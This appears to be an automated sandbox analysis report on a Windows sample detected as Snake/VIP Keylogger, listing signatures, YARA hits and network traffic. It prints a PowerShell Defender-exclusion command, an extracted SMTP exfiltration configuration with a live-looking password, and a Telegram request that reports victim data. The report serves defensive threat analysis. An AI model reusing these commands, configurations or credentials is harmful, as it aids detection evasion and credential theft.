Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Analysis ID:	1519297
MD5:	42f2ce52a57e0d72eac297a532354e42
SHA1:	7f2f1ef38365147865f1cec2c1d0ad62cdc6f7d0
SHA256:	516ffdb4ef149292e235bea6b676674d973e52c3382fdd3c40f85245f9e564ba
Tags:	exe
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)

powershell.exe (PID: 7456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7656 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@  ", "Host": "hosting2.ro.hostsailor.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@  ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbddd8:$a1: get_encryptedPassword 0x100bf8:$a1: get_encryptedPassword 0x257af0:$a1: get_encryptedPassword 0xbe360:$a2: get_encryptedUsername 0x101180:$a2: get_encryptedUsername 0x258078:$a2: get_encryptedUsername 0xbda4b:$a3: get_timePasswordChanged 0x10086b:$a3: get_timePasswordChanged 0x257763:$a3: get_timePasswordChanged 0xbdb62:$a4: get_passwordField 0x100982:$a4: get_passwordField 0x25787a:$a4: get_passwordField 0xbddee:$a5: set_encryptedPassword 0x100c0e:$a5: set_encryptedPassword 0x257b06:$a5: set_encryptedPassword 0xc0b0a:$a6: get_passwords 0x10392a:$a6: get_passwords 0x25a822:$a6: get_passwords 0xc0e9e:$a7: get_logins 0x103cbe:$a7: get_logins 0x25abb6:$a7: get_logins
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x605fe:$a1: get_encryptedPassword 0x60b7c:$a2: get_encryptedUsername 0x60280:$a3: get_timePasswordChanged 0x60397:$a4: get_passwordField 0x60614:$a5: set_encryptedPassword 0x632d8:$a6: get_passwords 0x63668:$a7: get_logins 0x632c4:$a8: GetOutlookPasswords 0x62c7d:$a9: StartKeylogger 0x635c1:$a10: KeyLoggerEventArgs 0x62d1d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x38ed7:$a1: get_encryptedPassword 0x39455:$a2: get_encryptedUsername 0x38b59:$a3: get_timePasswordChanged 0x38c70:$a4: get_passwordField 0x38eed:$a5: set_encryptedPassword 0x3bbb1:$a6: get_passwords 0x3bf41:$a7: get_logins 0x3bb9d:$a8: GetOutlookPasswords 0x3b556:$a9: StartKeylogger 0x3be9a:$a10: KeyLoggerEventArgs 0x3b5f6:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2c6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a969:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abc6:$a4: \Orbitum\User Data\Default\Login Data 0x3b5a5:$a5: \Kometa\User Data\Default\Login Data
4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394c6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b69:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dc6:$a4: \Orbitum\User Data\Default\Login Data 0x397a5:$a5: \Kometa\User Data\Default\Login Data
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394c6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b69:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dc6:$a4: \Orbitum\User Data\Default\Login Data 0x397a5:$a5: \Kometa\User Data\Default\Login Data
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x1c79b8:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x1c7f40:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x1c762b:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x1c7742:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x1c79ce:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x1ca6ea:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x1caa7e:$a7: get_logins
0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x1c8d7c:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x1c8d83:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x1c8d8b:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook 0x1c8d98:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, ParentProcessId: 7252, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe", ProcessId: 7456, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, ParentProcessId: 7252, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe", ProcessId: 7456, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T10:33:12.614165+0200	2803305	3	Unknown Traffic	192.168.2.4	49747	188.114.97.3	443	TCP
2024-09-26T10:33:23.063659+0200	2803305	3	Unknown Traffic	192.168.2.4	49761	188.114.97.3	443	TCP
2024-09-26T10:33:24.575891+0200	2803305	3	Unknown Traffic	192.168.2.4	49763	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T10:33:10.667560+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49744	132.226.8.169	80	TCP
2024-09-26T10:33:12.042568+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49744	132.226.8.169	80	TCP
2024-09-26T10:33:14.421416+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49749	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49745 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4x nop then jmp 00ECF8E9h		4_2_00ECF630
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4x nop then jmp 00ECFD41h		4_2_00ECFA88

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2026/09/2024%20/%2021:13:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
